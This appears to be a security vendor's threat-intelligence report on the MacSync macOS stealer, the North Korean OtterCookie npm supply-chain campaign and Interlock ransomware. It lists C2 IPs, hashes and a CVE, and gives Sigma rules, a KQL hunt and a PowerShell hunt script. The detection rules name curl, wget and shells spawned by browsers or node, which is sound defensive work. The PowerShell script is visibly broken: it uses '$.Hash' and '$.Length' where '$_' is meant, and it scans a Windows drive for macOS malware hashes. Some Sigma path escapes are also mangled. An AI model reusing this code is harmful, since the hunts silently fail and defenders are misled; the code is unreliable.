MacSync & OtterCookie Stealers: North Korean Supply Chain & macOS Campaigns with Interlock Ransomware CVE Exploits\n\nIntelligence Source: AlienVault OTX Live Pulses\nDate: 2026-04-14\nAuthor: Security Arsenal Threat Intelligence Unit\n\n---\n\n## Threat Summary\n\nRecent OTX pulses reveal a convergence of high-impact threats targeting distinct sectors: SLTT Government macOS users and the Technology supply chain. \n\n1. macOS MaaS Campaign: The MacSync Stealer campaign has evolved into a sophisticated Malware-as-a-Service (MaaS) operation. It is actively targeting State, Local, Tribal, and Territorial (SLTT) government entities using SEO poisoning and "ClickFix" fake CAPTCHA techniques. The malware has shifted to shell-based loaders delivering dynamic AppleScript payloads.\n\n2. North Korean Supply Chain Attack: The FAMOUS CHOLLIMA threat actor is leveraging the npm ecosystem to distribute the OtterCookie infostealer. Using a "contagious interview" scam and typosquatting, they clone legitimate libraries (e.g., big.js) to deliver payloads like BeaverTail and InvisibleFerret, aiming at technology sector developers.\n\n3. Ransomware & Zero-Day Exploitation: The Interlock Ransomware Group is exploiting critical vulnerabilities, most notably a zero-day in Cisco Firepower Management Center (CVE-2026-20131). This facilitates the deployment of custom malware including GHOSTKNIFE and PlasmaLoader.\n\nCollectively, these threats demonstrate an aggressive push for initial access via social engineering and supply chain compromise, followed immediately by credential theft and ransomware deployment.\n\n---\n\n## Threat Actor / Malware Profile\n\n### MacSync Stealer (Unknown Actor)\n* Type: Infostealer / MaaS\n* Target: macOS users (Government/SLTT)\n* Distribution: SEO Poisoning, Fake ClickFix CAPTCHAs, malicious "ChatGPT" conversations.\n* Payload: Shell-based loaders executing dynamic AppleScript.\n* Capability: Steals cryptocurrency wallets (Ledger), browser data, and system information.\n\n### FAMOUS CHOLLIMA (OtterCookie Campaign)\n* Attribution: North Korean APT (Lazarus Group adjunct).\n* Type: Supply Chain Attack / Infostealer\n* Target: Software Developers / Technology Sector\n* Distribution: Malicious npm packages (obfuscated), dependency confusion.\n* Malware: OtterCookie, BeaverTail, InvisibleFerret, Koalemos.\n* C2: Vercel-based C2 infrastructure and raw IP communication.\n* Persistence: SSH backdoor installation.\n\n### Interlock Ransomware Group\n* Type: Ransomware-as-a-Service / Exploitation\n* Tooling: GHOSTKNIFE, GHOSTSABER, PlasmaLoader, PLASMAGRID.\n* Vector: Exploitation of CVE-2026-20131 (Cisco FMC Zero-Day) and other high-risk CVEs.\n\n---\n\n## IOC Analysis\n\nThe provided pulses offer a mix of infrastructure and file-based indicators:\n\n* File Hashes (SHA256/MD5): Specific to the MacSync Stealer payloads. These should be used to scan endpoints for malware artifacts.\n* Domains/Hostnames: Compromised legitimate domains (e.g., houstongaragedoorinstallers.com) used for C2 or distribution in the MacSync campaign. These should be sinkholed or blocked at the proxy/DNS level.\n* IPv4 Addresses: A cluster of IPs (e.g., 144.172.110.228) associated with the OtterCookie C2 infrastructure.\n* CVEs: Critical identifiers (e.g., CVE-2026-20131) requiring immediate patch management prioritization.\n\nOperationalizing IOCs:\n* EDR: Hunt for file hashes on macOS endpoints.\n* Firewall/Proxy: Block the listed domains and IP subnets.\n* Vulnerability Management: Immediately scan for Cisco FMC and other vulnerabilities listed in the Interlock pulse.\n\n---\n\n## Detection Engineering\n\nThe following detection logic is tailored to the specific behaviors of MacSync (macOS scripting), OtterCookie (Node.js supply chain), and Interlock (Infrastructure exploitation).\n\nyaml\n---\ntitle: macOS MacSync Stealer Suspicious AppleScript Execution\ndescription: Detects shell-based loaders executing dynamic AppleScript payloads associated with MacSync Stealer, often triggered via fake browser workflows.\nstatus: experimental\ndate: 2026/04/14\nauthor: Security Arsenal\nreferences:\n - https://otx.alienvault.com/pulse/66000000000/\ntags:\n - attack.execution\n - attack.t1059.002\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith:\n - '/Google Chrome'\n - '/Firefox'\n - '/Safari'\n Image|endswith:\n - '/osascript'\n - '/sh'\n - '/zsh'\n CommandLine|contains:\n - 'curl'\n - 'wget'\n - 'http://'\n - 'https://'\n condition: selection\nfalsepositives:\n - Legitimate administrative automation scripts\nlevel: high\n---\ntitle: OtterCookie Node.js Supply Chain Attack\ndescription: Detects Node.js processes spawning shell or PowerShell, a hallmark of the OtterCookie/BeaverTail npm supply chain campaign.\nstatus: experimental\ndate: 2026/04/14\nauthor: Security Arsenal\nreferences:\n - https://otx.alienvault.com/pulse/66000000001/\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1204.002\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_parent:\n ParentImage|endswith:\n - '\node.exe'\n - 'node'\n selection_child:\n Image|endswith:\n - '\\powershell.exe'\n - '\\cmd.exe'\n - '\bash.exe'\n - '\\wsl.exe'\n condition: selection_parent and selection_child\nfalsepositives:\n - Legitimate developer build scripts (low volume)\nlevel: high\n---\ntitle: Interlock Ransomware PlasmaLoader C2 Activity\ndescription: Detects potential connections to known C2 infrastructure associated with the Interlock Ransomware Group and OtterCookie campaigns.\nstatus: experimental\ndate: 2026/04/14\nauthor: Security Arsenal\nreferences:\n - https://otx.alienvault.com/pulse/66000000002/\ntags:\n - attack.command_and_control\n - attack.c2\nlogsource:\n category: network_connection\ndetection:\n selection:\n DestinationIp|contains:\n - '144.172.110.'\n - '107.189.22.'\n condition: selection\nfalsepositives:\n - None (Known malicious IP ranges)\nlevel: critical\n\n\n### KQL Hunt (Microsoft Sentinel)\n\nkql\n// Hunt for OtterCookie/Interlock C2 IPs and MacSync Hashes\nlet IOCs = dynamic([\n "144.172.110.228", "144.172.110.96", "144.172.110.132", "107.189.22.20",\n "5190ef1733183a0dc63fb623357f56d6", // MacSync MD5\n "866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1" // MacSync SHA256\n]);\n// Network Connections to C2 Infrastructure\nDeviceNetworkEvents\n| where RemoteIP in (IOCs) \n| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl\n| extend Alert = "C2 Connection to OtterCookie/Interlock IP";\n// File Artifacts for MacSync\nDeviceFileEvents\n| where SHA256 in (IOCs) or MD5 in (IOCs)\n| project Timestamp, DeviceName, FileName, FolderPath, SHA256, MD5\n| extend Alert = "MacSync Stealer File Detected";\n\n\n### PowerShell Hunt Script\n\npowershell\n# IOC Hunter for MacSync Hashes and OtterCookie C2 IPs\n# Requires Admin privileges for accurate network enumeration\n\n$MacSyncHashes = @( \n "866993e9950250ac2ce8c3b4c6a8bd39285e0fafd93860f235a3b0370f160dd1",\n "b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0",\n "c56a1b268f358d9fb4d6264932706b53a7347e2544bb5f26355b0c7fc1d299d8"\n)\n\n$OtterCookieIPs = @(\n "144.172.110.228", "144.172.110.96", "144.172.110.132", "144.172.116.22",\n "144.172.93.169", "144.172.93.253", "144.172.99.248", "107.189.22.20"\n)\n\nWrite-Host "[+] Scanning for MacSync Stealer File Hashes..." -ForegroundColor Cyan\nGet-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object { \n $.Length -gt 0kb -and $MacSyncHashes -contains $.Hash\n} | Select-Object FullName, LastWriteTime | Format-Table\n\nWrite-Host "[+] Checking Active Network Connections for OtterCookie C2 IPs..." -ForegroundColor Cyan\n$netstat = netstat -ano | Select-String -Pattern "\\s+(TCP|UDP)"\nforeach ($line in $netstat) {\n $parts = $line -split "\\s+"\n $local = $parts[2]\n $remote = $parts[3]\n $state = $parts[4]\n $pid = $parts[5]\n \n $remoteIP = ($remote -split ":")[0]\n if ($OtterCookieIPs -contains $remoteIP) {\n $process = Get-Process -Id $pid -ErrorAction SilentlyContinue\n Write-Host "[!] Suspicious Connection: $remote (PID: $pid - Process: $($process.ProcessName))" -ForegroundColor Red\n }\n}\n\n\n---\n\n## Response Priorities\n\n* Immediate (0-24h):\n * Block all IOCs (Domains and IP ranges) at the network perimeter.\n * Scan macOS endpoints for the identified MacSync Stealer file hashes.\n * Identify and block the malicious npm packages associated with the OtterCookie campaign in internal artifact repositories.\n\n* 24h - 48h:\n * Credential Reset: If MacSync or OtterCookie execution is suspected, force reset of cryptocurrency wallets, SSH keys, and browser-saved credentials for affected users.\n * Hunt: Run the provided PowerShell/KQL queries to identify lateral movement or persistence.\n\n* 1 Week:\n * Patch Management: Prioritize patching for CVE-2026-20131 (Cisco FMC) and the 31 high-impact vulnerabilities listed in the March 2026 CVE landscape.\n * Supply Chain Hardening: Implement strict package verification and allow-listing for npm/internal package registries.\n\n---\n\n## Related Resources\nSecurity Arsenal Incident Response\nManaged SOC & MDR Services\nAlertMonitor Threat Detection\nFrom The Dark Side Intel Hub\n